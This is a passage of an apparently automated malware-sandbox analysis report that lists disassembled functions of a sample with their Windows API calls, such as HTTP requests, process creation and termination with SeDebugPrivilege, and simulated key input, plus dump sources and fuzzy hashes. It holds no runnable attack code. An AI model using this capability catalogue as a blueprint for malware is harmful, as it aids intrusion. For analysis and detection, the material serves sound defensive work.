                            Function 00DB1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DB1A50
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DB1A7C
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DB1ABE
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DB1AD3
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DB1AE0
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00DB1B10
                            • InternetCloseHandle.WININET(00000000), ref: 00DB1B57
                              • Part of subcall function 00DB2483: GetLastError.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB2498
                              • Part of subcall function 00DB2483: SetEvent.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB24AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                            • String ID:
                            • API String ID: 2603140658-3916222277
                            • Opcode ID: ce56cd44a7d68e336512c4d4db0d6e47cc99c534ba488619ee4c7d01cb739a97
                            • Instruction ID: db4762155b8827104024eeeb8aef978061f696b1236156f6b75bf5f5de43235f
                            • Opcode Fuzzy Hash: ce56cd44a7d68e336512c4d4db0d6e47cc99c534ba488619ee4c7d01cb739a97
                            • Instruction Fuzzy Hash: 5D418CB5501219FFEB118F50CC99FFA7BADEF09354F04412AF9069A281E7709E458BB4
                            Function 00DB8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00DCF910), ref: 00DB8D28
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00DCF910), ref: 00DB8D5C
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DB8ED6
                            • SysFreeString.OLEAUT32(?), ref: 00DB8F00
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                            • String ID:
                            • API String ID: 560350794-0
                            • Opcode ID: c87c8859e5e10f966d79d4aa0f9438cd602e5a9440d31f8623ab17c0bc1aefa5
                            • Instruction ID: 06c0c572fcf0882f58ed81aa2b05c7f331755e3857c12e2d07a1d1aee5a95172
                            • Opcode Fuzzy Hash: c87c8859e5e10f966d79d4aa0f9438cd602e5a9440d31f8623ab17c0bc1aefa5
                            • Instruction Fuzzy Hash: 90F1E671A00209EFDB14EF94C884EEEB7B9FF49315F148458F906AB251DB31AE46DB60
                            Function 00DBF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DBF6B5
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF848
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF86C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF8AC
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBF8CE
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DBFA4A
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DBFA7C
                            • CloseHandle.KERNEL32(?), ref: 00DBFAAB
                            • CloseHandle.KERNEL32(?), ref: 00DBFB22
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 2d28d8a8422fbcc7701a69a18f98ca7e1cb3ee42c0bd92d15a083fcd9adc7199
                            • Instruction ID: 328db561c56354810e104be6d021fc3d6048962b476b109c153bb640fe7bbe99
                            • Opcode Fuzzy Hash: 2d28d8a8422fbcc7701a69a18f98ca7e1cb3ee42c0bd92d15a083fcd9adc7199
                            • Instruction Fuzzy Hash: A6E16031604341DFCB14DF25C891AAABBE1EF85354F18896DF8969B2A2CB31DC45CB72
                            Function 00DA4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DA3697,?), ref: 00DA468B
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DA3697,?), ref: 00DA46A4
                              • Part of subcall function 00DA4A31: GetFileAttributesW.KERNEL32(?,00DA370B), ref: 00DA4A32
                            • lstrcmpiW.KERNEL32(?,?), ref: 00DA4D40
                            • _wcscmp.LIBCMT ref: 00DA4D5A
                            • MoveFileW.KERNEL32 ref: 00DA4D75
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                            • String ID:
                            • API String ID: 793581249-0
                            • Opcode ID: b17d7c069ad87226e69158e1d5515254e86ff1eac278f3834b6b6d4c86c7e776
                            • Instruction ID: e836925241a2097c2f34028831244311fce8ba6b4f702f0958ec3b04ce161c93
                            • Opcode Fuzzy Hash: b17d7c069ad87226e69158e1d5515254e86ff1eac278f3834b6b6d4c86c7e776
                            • Instruction Fuzzy Hash: 145151B24083859BC764DB64D8819DFB3ECEF85350F04092EB689D3152EF74A688CB76
                            Function 00DC8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC86FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: f73c2107a23d658d9485d2676b70a8175f64d06b466898c9253fb9de03480412
                            • Instruction ID: 0324e5a48c1253af75a23c1a287f78322ab00a2fd23884c998172a74a967c241
                            • Opcode Fuzzy Hash: f73c2107a23d658d9485d2676b70a8175f64d06b466898c9253fb9de03480412
                            • Instruction Fuzzy Hash: 7051B030540246BFEB209B68DC89FA97B65EF05320F64411AF951E76E0DF71E980EB70
                            Function 00D42B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32 ref: 00D7C2F7
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D7C319
                            • LoadImageW.USER32 ref: 00D7C331
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D7C34F
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D7C370
                            • DestroyIcon.USER32(00000000), ref: 00D7C37F
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D7C39C
                            • DestroyIcon.USER32(?), ref: 00D7C3AB
                              • Part of subcall function 00DCA4AF: DeleteObject.GDI32(00000000), ref: 00DCA4E8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                            • String ID:
                            • API String ID: 2819616528-0
                            • Opcode ID: ae17699faf547db4bee5c9706e967a19fbb1f00f35868a7003d1906e0ccefb77
                            • Instruction ID: d8a37844f4ac617ee3678dad0bd701c2e356bed5421c2ebdd81f51614e13c2bd
                            • Opcode Fuzzy Hash: ae17699faf547db4bee5c9706e967a19fbb1f00f35868a7003d1906e0ccefb77
                            • Instruction Fuzzy Hash: 7F51487061020AAFDB24DF65CC85FAA7BA5EB48310F548528F946E7290E770ED90DB70
                            Function 00D9966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D9A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9A84C
                              • Part of subcall function 00D9A82C: GetCurrentThreadId.KERNEL32(00000000,?,00D99683,?,00000001), ref: 00D9A853
                              • Part of subcall function 00D9A82C: AttachThreadInput.USER32(00000000,?,00D99683), ref: 00D9A85A
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D9968E
                            • PostMessageW.USER32 ref: 00D996AB
                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D996AE
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D996B7
                            • PostMessageW.USER32 ref: 00D996D5
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D996D8
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D996E1
                            • PostMessageW.USER32 ref: 00D996F8
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D996FB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                            • String ID:
                            • API String ID: 2014098862-0
                            • Opcode ID: 1f15b627e2303cbcda63ae938af089655d9ac94bd9013a0bb9252985c6969ded
                            • Instruction ID: b43db27c3a2fc7eac7a4c2ea5256e4bd1ec439a2d5769f99e57f059ef24bfe92
                            • Opcode Fuzzy Hash: 1f15b627e2303cbcda63ae938af089655d9ac94bd9013a0bb9252985c6969ded
                            • Instruction Fuzzy Hash: C811C27195031ABEFB106B649C49FAA7A1EDB4C790F110425F684AB1A0C9F25C119AB4
                            Function 00D98921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D9853C,00000B00,?,?), ref: 00D9892A
                            • HeapAlloc.KERNEL32(00000000,?,00D9853C,00000B00,?,?), ref: 00D98931
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D9853C,00000B00,?,?), ref: 00D98946
                            • GetCurrentProcess.KERNEL32(?,00000000,?,00D9853C,00000B00,?,?), ref: 00D9894E
                            • DuplicateHandle.KERNEL32 ref: 00D98951
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D9853C,00000B00,?,?), ref: 00D98961
                            • GetCurrentProcess.KERNEL32(00D9853C,00000000,?,00D9853C,00000B00,?,?), ref: 00D98969
                            • DuplicateHandle.KERNEL32 ref: 00D9896C
                            • CreateThread.KERNEL32(00000000,00000000,00D98992,00000000,00000000,00000000), ref: 00D98986
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            • Opcode ID: c4af9d2906c3106f485235ef835b120501ff4e7fe41c20781258588893e0da33
                            • Instruction ID: d991dc10176672dc24c06abe9dbe59120445db80200e3094f317b91fb20e8408
                            • Opcode Fuzzy Hash: c4af9d2906c3106f485235ef835b120501ff4e7fe41c20781258588893e0da33
                            • Instruction Fuzzy Hash: 1501BBB5240309FFE710ABA5DC4DFAB7BADEB89711F448421FA05DB2A1CA719800CB30
                            Function 00DB9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 0-572801152
                            • Opcode ID: 1b7a7e44e5d5182e91576f120dcd9e4adff0933f23e3ee8579162428128baed1
                            • Instruction ID: a334bb83ee0fbc73036502856089e3c97ee7af70b986aace2ab783af77ba460b
                            • Opcode Fuzzy Hash: 1b7a7e44e5d5182e91576f120dcd9e4adff0933f23e3ee8579162428128baed1
                            • Instruction Fuzzy Hash: 05C17071A0025ADBDF10DF68D894AEEB7F5EB48314F148469EA06AB281E770DD45CB70
                            Function 00DB9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$_memset
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 2862541840-625585964
                            • Opcode ID: e0b334583233fe51b57c6f50dc5e9eac27a27a685c5251cb141478bfd4fbfb61
                            • Instruction ID: 3bcaaa8e3902ca89b99f9940e1ebce3c33f8bd6411318527160feef7f0fdd999
                            • Opcode Fuzzy Hash: e0b334583233fe51b57c6f50dc5e9eac27a27a685c5251cb141478bfd4fbfb61
                            • Instruction Fuzzy Hash: 7A918B71A00259EBDF24DFA5C898FEEBBB8EF45710F148119F616AB280D7709945CBB0
                            Function 00DB975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D9710A: CLSIDFromProgID.OLE32 ref: 00D97127
                              • Part of subcall function 00D9710A: ProgIDFromCLSID.OLE32(?,00000000), ref: 00D97142
                              • Part of subcall function 00D9710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D97044,80070057,?,?), ref: 00D97150
                              • Part of subcall function 00D9710A: CoTaskMemFree.OLE32(00000000), ref: 00D97160
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DB9806
                            • _memset.LIBCMT ref: 00DB9813
                            • _memset.LIBCMT ref: 00DB9956
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00DB9982
                            • CoTaskMemFree.OLE32(?), ref: 00DB998D
                            Strings
                            • NULL Pointer assignment, xrefs: 00DB99DB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1300414916-2785691316
                            • Opcode ID: e382ca2533dcb1f63293018c197ddc0629d834edad85b560ae779e2f7f52b52f
                            • Instruction ID: 92d2c001beb65ac9c5410aab0f2f88e483d1858e71b5f520d7a6b208d1a4974c
                            • Opcode Fuzzy Hash: e382ca2533dcb1f63293018c197ddc0629d834edad85b560ae779e2f7f52b52f
                            • Instruction Fuzzy Hash: A6910371900229EBDB10DFA5D891EDEBBB9EF08710F20415AF51AA7291DB719A44CFB0
                            Function 00DC6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DC6E24
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00DC6E38
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC6E52
                            • _wcscat.LIBCMT ref: 00DC6EAD
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DC6EC4
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DC6EF2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: SysListView32
                            • API String ID: 307300125-78025650
                            • Opcode ID: f536cf4477a4a2072e9819f696fbb2011398f5697d8eb007cb84a1fb45b4bd04
                            • Instruction ID: c5fad7cf6fe3405190ebbd9f019ca16fa45a2ec603f485b9bb22b75fcadbc869
                            • Opcode Fuzzy Hash: f536cf4477a4a2072e9819f696fbb2011398f5697d8eb007cb84a1fb45b4bd04
                            • Instruction Fuzzy Hash: 4741AF75A0030AAFEB219F64CC85FEAB7A9EF08350F14452EF585E7291D671DD848B70
                            Function 00DBE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DA3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00DA3C7A
                              • Part of subcall function 00DA3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00DA3C88
                              • Part of subcall function 00DA3C55: CloseHandle.KERNEL32(00000000), ref: 00DA3D52
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBE9A4
                            • GetLastError.KERNEL32 ref: 00DBE9B7
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBE9E6
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DBEA63
                            • GetLastError.KERNEL32(00000000), ref: 00DBEA6E
                            • CloseHandle.KERNEL32(00000000), ref: 00DBEAA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            • Opcode ID: 4cb650136142366604f7e146057e7823db19f24131dc7666eab71221cf13e106
                            • Instruction ID: 8b42919dfce8d0ca5dfddcc1a3876bf59cf6a5f68d83ec3d44fae9f399f0a34b
                            • Opcode Fuzzy Hash: 4cb650136142366604f7e146057e7823db19f24131dc7666eab71221cf13e106
                            • Instruction Fuzzy Hash: 99417B716002019FDB14EF24CCA5FAEBBA5EF40314F188459F9469B2D2CB75E909CBB1
                            Function 00DA2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            • Opcode ID: 432675eff4c061f0053a4e5565e5110d5dd03594bd7c334782eac061f59374b4
                            • Instruction ID: 59258bfbc20d5987b365c4f22beeaaafede853b9de847a2b17218b2de9e9f7a1
                            • Opcode Fuzzy Hash: 432675eff4c061f0053a4e5565e5110d5dd03594bd7c334782eac061f59374b4
                            • Instruction Fuzzy Hash: FA112B3534874ABFD7149F14DC82CBB779CDF16320B10402AFA00A62C2DB759F4455B9
                            Function 00DA42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DA4312
                            • LoadStringW.USER32(00000000), ref: 00DA4319
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DA432F
                            • LoadStringW.USER32(00000000), ref: 00DA4336
                            • _wprintf.LIBCMT ref: 00DA435C
                            • MessageBoxW.USER32 ref: 00DA437A
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 00DA4357
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
